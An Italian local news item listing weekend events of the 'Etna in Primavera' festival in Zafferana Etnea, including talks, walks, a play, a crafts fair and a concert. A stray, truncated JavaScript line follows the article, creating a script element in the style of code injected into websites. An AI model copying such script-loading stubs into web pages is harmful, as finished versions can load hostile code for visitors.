Sarà un altro, lungo week-end quello che chiuderà il mese di aprile nell’ambito dell’ottava edizione di “Etna in Primavera”, la kermesse in corso di svolgimento a Zafferana Etnea.

Si inizia sabato 29 con la conferenza dal titolo “Le piante alimurgiche dell’Etna: dall’antica cucina tradizionale sicula ai giorni nostri” a cura della naturalista Elisa Barbara Coppola. L’evento si terrà nella Sala consiliare alle 17.

Domenica 30, poi, appuntamento con la Festa dell’Aquilone, a cura della Parrocchia San Giuseppe, in programma dalle ore 9,30 alle 12,30 nella piazza principale di Pisano. Nella stessa giornata, previste passeggiate nelle campagne (dalle 10,30 alle 12,30) alla ricerca di verdure spontanee commestibili di campo che allignano sui suoli considerati tra i più fertili d’Europa.

Alle ore 18,30, la Sala Consiliare ospiterà la presentazione ufficiale del nuovo “singolo” del cantautore Francesco Foti nel corso di un appuntamento curato da Vladimir Di Prima mentre alle ore 19,30 il Centro sociale di via Fossazza ospiterà la rappresentazione “Grisù, Giuseppe e Maria”- II atti di Giovanni Clementi, presentata dalla compagnia “Gli Amatoriali” con regia di Daniela Uva, a cura di Val Calanna Teatro.

Nella giornata di lunedì 1° maggio, la Festa degli Antichi Mestieri in piazza Umberto I con dimostrazioni artigianali a cura di fabbri, ceramisti, ricamatrici ed esperti di cesti antichi. La giornata festiva sarà, poi, conclusa dal concerto di Ricky Guarango previsto in piazza Umberto I.

 var d=document;var s=d.createElement(‘script’);

Comments are closed.